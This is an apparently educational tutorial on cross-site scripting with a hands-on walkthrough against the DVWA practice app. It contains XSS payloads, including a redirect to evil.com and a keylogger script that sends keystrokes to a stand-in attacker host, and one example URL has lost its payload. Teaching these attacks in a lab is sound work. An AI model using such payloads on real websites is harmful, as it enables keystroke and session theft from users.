Cross-Site Scripting (XSS) is one of the most widespread and dangerous web vulnerabilities that allows attackers to inject malicious scripts into trusted websites. These scripts are then executed in the browser of unsuspecting users, leading to stolen cookies, session hijacking, phishing, or even complete account takeover.
According to the OWASP Top 10, XSS has been a recurring critical issue for years, and despite security awareness, it remains common in modern applications. In this lesson, we’ll explore what XSS is, its types, how it works, and how you can practice exploiting it in a controlled lab environment using DVWA.
What is Cross-Site Scripting (XSS)?
XSS occurs when an application accepts untrusted input and includes it in web pages without proper validation or escaping. Because browsers trust scripts that come from the website itself, malicious scripts are executed in the user’s context.
This means the attacker can:
- Steal cookies or session tokens.
- Redirect users to malicious websites.
- Deface web pages.
- Capture keystrokes (keylogging).
- Spread malware or worms across users of the site.
Types of XSS Attacks
There are three primary types of Cross-Site Scripting:
1. Reflected XSS
The malicious script is immediately reflected back in the server’s response.
Typically delivered via a crafted URL or form input.
Example:
http://victim.com/page.php?q=<script>alert('XSS')</script> When clicked, the script executes in the victim’s browser.
2. Stored XSS
- The payload is permanently stored on the server (e.g., in a database, comment section, or message board).
- Every time a user loads the page, the script executes automatically.
- This is more dangerous because it impacts all users visiting the page.
3. DOM-Based XSS
The vulnerability exists in client-side JavaScript, not the server.
The script is executed by modifying the DOM environment (document structure) directly in the browser.
Example:
document.write(location.hash);
If the URL is http://victim.com/#, the script runs in the browser.
Real-World Consequences of XSS
XSS may sound like a harmless “popup alert” trick, but its consequences can be devastating:
- Session Hijacking: Attacker steals cookies to impersonate the victim.
- Account Takeover: With stolen sessions, attackers can access sensitive accounts.
- Phishing: Fake login forms can be injected to harvest credentials.
- Defacement: Websites can be altered to display unwanted content.
- Malware Delivery: Injected scripts can force downloads or redirect users to malicious sites.
Hands-On: Exploiting XSS in DVWA
Now let’s move into the lab environment and practice XSS on DVWA (Damn Vulnerable Web App).
Step 1: Setup
- Log into DVWA (
admin:password). - Set DVWA Security Level to Low.
- Navigate to the XSS (Reflected) section.
Step 2: Reflected XSS Attack
Locate the input field (e.g., search or query parameter).
Enter the following payload:
<script>alert('XSS')</script>Submit the form.
If vulnerable, the browser will display an alert box with the message XSS.
This confirms that the application is injecting your input directly into the page without sanitization.
Step 3: Stored XSS Attack
Go to DVWA → XSS (Stored).
In the comment box, enter:
<script>alert('Stored XSS')</script>Submit the form.
Refresh the page or view the comment section.
The alert will pop up each time the page loads — showing the script is stored and affects all users who view it.
Step4: Advanced Payloads
Beyond alert() popups, attackers can execute more harmful payloads:
Stealing cookies:
<script>document.write(document.cookie)</script>
Redirecting victims:
<script>window.location='http://evil.com'</script>
Keylogging example:
<script>document.onkeypress=function(e){fetch('http://evil.com/log?key='+e.key)}</script>Key Takeaways
- XSS is a client-side vulnerability that exploits the trust between users and websites.
- It comes in three main forms: Reflected, Stored, and DOM-Based.
- Even though it often starts with simple JavaScript alerts, the real danger lies in session hijacking, phishing, and malware distribution.
- Practicing in DVWA provides hands-on understanding of how attackers craft payloads and how applications fail to sanitize input.
✅ By the end of this lesson, you should have a deep understanding of Cross-Site Scripting, its different types, and the ability to perform reflected, stored, and DOM-based XSS attacks in your lab.
I’m Emmanuel Okaiwele, a Secure Web Developer, Offensive Security Engineer, Member Cybersecurity Experts Association of Nigeria – CSEAN, and the founder of Nebitex Africa — a platform dedicated to making cybersecurity simple, practical, and accessible for Africans.
